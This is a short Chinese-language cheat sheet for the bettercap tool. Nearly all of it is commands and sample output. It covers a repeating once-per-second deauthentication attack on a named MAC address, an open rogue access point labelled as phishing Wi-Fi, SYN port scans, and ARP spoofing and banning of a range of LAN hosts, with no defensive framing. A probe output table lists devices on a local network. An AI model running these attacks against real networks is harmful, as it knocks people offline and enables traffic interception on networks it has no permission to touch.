bettercap

bettercap 入门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bettercap -autostart net.probe on, set ticker.commands net.show, ticker on 
bettercap -eval "net.probe on; set ticker.commands net.show; ticker on"

help wifi
active 显示活动的模块

get wifi.ap.encryption # 获取参数值
get * # 获取所有参数

set wifi.ap.encryption false # 设置参数

help net.recon # 探测模块帮助
wifi.recon on # 开启 wifi 探测
wifi.show # 显示 wifi 列表
wifi.deauth 72:fe:a1:d2:fb:c2 # 攻击一次

全自动 wifi 攻击

1
2
3
4
5
help ticker
set ticker.commands "wifi.deauth d4:ee:07:67:cc:16"
set ticker.period 1 # 设置每秒攻击一次
ticker on
ticker off

全自动探测 wifi 热点

1
2
3
4
set ticker.commands "wifi.recon on; wifi.show"
set ticker.period 5
ticker on
ticker off

设置钓鱼 wifi

1
2
3
4
5
wifi.recon off
set wifi.ap.ssid danke601
set ap.encryption false
wifi.recon on
wifi.ap

端口探测

1
2
3
4
help syn.scan
syn.scan 192.168.1.107 22
net.show
syn.scan 192.168.1.1/24 3000-4000

arp 欺骗

1
2
3
net.probe on
net.show
set arp.spoof.targets 192.168.1.100-104; arp.ban on

探测网络

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
net.probe on # 开启探测
net.show

192.168.1.0/24 > 192.168.1.6 » net.probe on
192.168.1.0/24 > 192.168.1.6 » [11:30:53] [endpoint.new] endpoint 192.168.1.17 detected as 8c:85:90:a8:f1:5a (Apple, Inc.).
192.168.1.0/24 > 192.168.1.6 » [11:30:53] [endpoint.new] endpoint 192.168.1.5 detected as d4:ee:07:67:d3:5d (HIWIFI Co., Ltd.).
192.168.1.0/24 > 192.168.1.6 » [11:30:53] [endpoint.new] endpoint 192.168.1.2 detected as 00:02:ee:91:cc:9a (Nokia Danmark A/S).
192.168.1.0/24 > 192.168.1.6 » net.show

+---------------+--------------------+------------+---------------------------------------------------+---------+---------+------------+------------------------------------+
| IP | MAC | Name | Vendor | Sent | Recvd | Last Seen | Meta |
+---------------+--------------------+------------+---------------------------------------------------+---------+---------+------------+------------------------------------+
| 192.168.1.6 | 78:4f:43:8b:26:c2 | en0 | Apple, Inc. | 0 B | 0 B | 10:57:09 | - |
| | | | | | | | |
| 192.168.1.1 | 9c:fe:a1:d2:fb:b8 | localhost | Fiberhome Telecommunication Technologies Co.,LTD | 315 kB | 179 kB | 11:31:01 | - |
| 192.168.1.2 | 00:02:ee:91:cc:9a | localhost | Nokia Danmark A/S | 240 B | 184 B | 11:31:01 | - |
| 192.168.1.4 | e4:a7:c5:03:ba:f9 | localhost | Huawei Technologies Co.,Ltd | 5.8 kB | 2.1 kB | 11:31:00 | - |
| 192.168.1.5 | d4:ee:07:67:d3:5d | localhost | HIWIFI Co., Ltd. | 120 B | 184 B | 11:30:53 | - |
| 192.168.1.9 | b8:63:4d:5d:a7:db | localhost | Apple, Inc. | 1.2 kB | 92 B | 11:16:51 | mdns:hostname:iPhonnizhider.local |
| 192.168.1.17 | 8c:85:90:a8:f1:5a | localhost | Apple, Inc. | 28 kB | 428 B | 11:30:54 | nbns:hostname:?????Z |
+---------------+--------------------+------------+---------------------------------------------------+---------+---------+------------+------------------------------------+

↑ 15 kB / ↓ 321 MB / 578185 pkts / 0 errs